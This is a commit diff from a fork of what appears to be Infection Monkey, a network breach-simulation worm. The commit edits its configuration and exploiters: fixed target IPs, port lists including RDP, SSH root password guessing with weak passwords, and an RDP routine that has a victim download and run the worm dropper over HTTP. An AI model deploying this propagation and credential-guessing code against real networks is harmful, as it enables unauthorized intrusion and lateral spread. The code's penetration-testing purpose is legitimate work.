forked from p34709852/monkey
minor bug fix
This commit is contained in:
parent
410891518f
commit
73f9821ee4
|
@ -96,6 +96,8 @@ class Configuration(object):
|
|||
### monkey config
|
||||
###########################
|
||||
|
||||
alive = True
|
||||
|
||||
singleton_mutex_name = "{2384ec59-0df8-4ab9-918c-843740924a28}"
|
||||
|
||||
# how long to wait between scan iterations
|
||||
|
@ -127,11 +129,11 @@ class Configuration(object):
|
|||
|
||||
#range_class = RelativeRange
|
||||
range_size = 8
|
||||
range_class = ClassCRange
|
||||
range_fixed = ("10.0.0.1")
|
||||
range_class = FixedRange
|
||||
range_fixed = ("10.0.0.9", "10.0.0.13", "192.168.1.100", "192.168.1.87")
|
||||
|
||||
# TCP Scanner
|
||||
tcp_target_ports = [22, 445, 135]
|
||||
tcp_target_ports = [22, 445, 135, 3389]
|
||||
tcp_scan_timeout = 1000 # 1000 Milliseconds
|
||||
tcp_scan_interval = 200
|
||||
tcp_scan_get_banner = True
|
||||
|
@ -157,6 +159,7 @@ class Configuration(object):
|
|||
ssh_user = "root"
|
||||
ssh_passwords = ["root", "toor", "1234", "12345678"]
|
||||
|
||||
alive = True
|
||||
#rdp exploiter
|
||||
rdp_use_vbs_download = True
|
||||
|
||||
WormConfiguration = Configuration()
|
|
@ -11,7 +11,7 @@ from rdpy.core.error import RDPSecurityNegoFail
|
|||
from logging import getLogger
|
||||
from exploit import HostExploiter
|
||||
from exploit.tools import HTTPTools
|
||||
from model import RDP_CMDLINE_HTTP_BITS
|
||||
from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
|
||||
from model.host import VictimHost
|
||||
from network.tools import check_port_tcp
|
||||
from exploit.tools import get_target_monkey
|
||||
|
@ -243,7 +243,10 @@ class RdpExploiter(HostExploiter):
|
|||
# create server for http download.
|
||||
http_path, http_thread = HTTPTools.create_transfer(host, src_path)
|
||||
|
||||
command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(src_path), 'http_path' : http_path}
|
||||
if self._config.rdp_use_vbs_download:
|
||||
command = RDP_CMDLINE_HTTP_VBS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path}
|
||||
else:
|
||||
command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path}
|
||||
|
||||
passwords = list(self._config.psexec_passwords[:])
|
||||
known_password = host.get_credentials(self._config.psexec_user)
|
||||
|
@ -289,9 +292,6 @@ class RdpExploiter(HostExploiter):
|
|||
LOG.debug("Exploiter RdpGrinder failed, rdp failed.")
|
||||
return False
|
||||
elif http_thread.downloads == 0:
|
||||
LOG.info("Trying rdp logging into victim %r with user"
|
||||
" %s and password '%s'", host,
|
||||
self._config.psexec_user, password)
|
||||
LOG.debug("Exploiter RdpGrinder failed, http download failed.")
|
||||
return False
|
||||
|
||||
|
|
|
@ -3,6 +3,7 @@ from logging import getLogger
|
|||
from model.host import VictimHost
|
||||
from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED
|
||||
from exploit import HostExploiter
|
||||
from network.tools import check_port_tcp
|
||||
from exploit.tools import SmbTools, get_target_monkey
|
||||
from network import SMBFinger
|
||||
|
||||
|
@ -49,7 +50,7 @@ class SmbExploiter(HostExploiter):
|
|||
is_nb_open,_ = check_port_tcp(host.ip_addr, 139)
|
||||
if is_nb_open:
|
||||
host.os['type'] = 'windows'
|
||||
return super(HostExploiter, self).is_os_supported(host)
|
||||
return host.os.get('type') in self._target_os_type
|
||||
return False
|
||||
|
||||
def exploit_host(self, host, src_path=None):
|
||||
|
|
|
@ -5,10 +5,12 @@ import logging
|
|||
from exploit import HostExploiter
|
||||
from model import MONKEY_ARG
|
||||
from exploit.tools import get_target_monkey
|
||||
from network.tools import check_port_tcp
|
||||
|
||||
__author__ = 'hoffer'
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
SSH_PORT = 22
|
||||
|
||||
class SSHExploiter(HostExploiter):
|
||||
_target_os_type = ['linux', None]
|
||||
|
@ -20,6 +22,16 @@ class SSHExploiter(HostExploiter):
|
|||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
|
||||
|
||||
port = SSH_PORT
|
||||
for servkey,servdata in host.services.items():
|
||||
if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
|
||||
port = int(servkey.replace('tcp-',''))
|
||||
|
||||
is_open,_ = check_port_tcp(host.ip_addr, port)
|
||||
if not is_open:
|
||||
LOG.info("SSH port is closed on %r, skipping", host)
|
||||
return False
|
||||
|
||||
passwords = list(self._config.ssh_passwords[:])
|
||||
known_password = host.get_credentials(self._config.ssh_user)
|
||||
if known_password is not None:
|
||||
|
@ -32,7 +44,8 @@ class SSHExploiter(HostExploiter):
|
|||
try:
|
||||
ssh.connect(host.ip_addr,
|
||||
username=self._config.ssh_user,
|
||||
password=password)
|
||||
password=password,
|
||||
port=port)
|
||||
|
||||
LOG.debug("Successfully logged in %r using SSH (%s : %s)",
|
||||
host, self._config.ssh_user, password)
|
||||
|
|
|
@ -15,6 +15,7 @@ from model.host import VictimHost
|
|||
from model import DROPPER_CMDLINE, MONKEY_CMDLINE
|
||||
from exploit import HostExploiter
|
||||
from exploit.tools import SmbTools, get_target_monkey
|
||||
from network.tools import check_port_tcp
|
||||
|
||||
try:
|
||||
from impacket import smb
|
||||
|
|
|
@ -5,6 +5,7 @@ import logging
|
|||
from network import HostScanner
|
||||
from config import WormConfiguration
|
||||
from info import local_ips
|
||||
from network.range import *
|
||||
|
||||
__author__ = 'itamar'
|
||||
|
||||
|
@ -26,6 +27,10 @@ class NetworkScanner(object):
|
|||
|
||||
LOG.info("Found local IP addresses of the machine: %r", self._ip_addresses)
|
||||
|
||||
# for fixed range, only scan once.
|
||||
if WormConfiguration.range_class is FixedRange:
|
||||
self._ranges = [WormConfiguration.range_class('0.0.0.0')]
|
||||
else:
|
||||
self._ranges = [WormConfiguration.range_class(ip_address)
|
||||
for ip_address in self._ip_addresses]
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@ from model.host import VictimHost
|
|||
SSH_PORT = 22
|
||||
SSH_SERVICE = 'tcp-22'
|
||||
SSH_REGEX = 'SSH-\d\.\d-OpenSSH'
|
||||
TIMEOUT = 30
|
||||
TIMEOUT = 10
|
||||
BANNER_READ = 1024
|
||||
LINUX_DIST_SSH = ['ubuntu', 'debian']
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
import socket
|
||||
import select
|
||||
|
||||
DEFAULT_TIMEOUT = 30
|
||||
DEFAULT_TIMEOUT = 10
|
||||
BANNER_READ = 1024
|
||||
|
||||
def check_port_tcp(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):
|
||||
|
|
Loading…
Reference in New Issue